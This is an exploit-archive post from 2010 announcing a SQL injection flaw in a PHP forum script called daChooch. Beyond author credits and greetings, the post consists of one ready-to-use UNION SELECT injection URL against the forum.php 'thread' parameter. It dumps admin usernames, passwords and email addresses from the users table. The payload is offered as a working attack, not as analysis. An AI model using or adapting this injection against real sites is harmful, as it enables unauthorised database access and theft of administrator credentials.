[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : daChooch Remote Sql Injection Vulnerability
# Published : 2010-02-12
# Author : Snakespc
# Previous Title : CMS Made Simple 1.6.6 Multiple Vulnerabilities
# Next Title : Omnidocs SQL injection Vulnerability


==============================================================================
[?] Dachooch Remote Sql Injection Vulnerability
==============================================================================
  
[?] Script:   [dachooch ]
[?] Language: [ PHP ]
[?] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[?] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[?] Note:     [ Hna Rana Fi South Africa (Coupe du monde)  ]
  
###########################################################################
 ===[ Exploit ]=== 
  
[?] http://server/forum.php?mid=3&smid=0&group=3&thread=-3+UNION all SELECT 1,2,unhex(hex(group_concat(admin,0x3a,pass,0x3a,email))),CHAR(115, 101, 99, 45, 119, 97, 114),5,6+from+users--
[?]Author: Snakespc <-
###########################################################################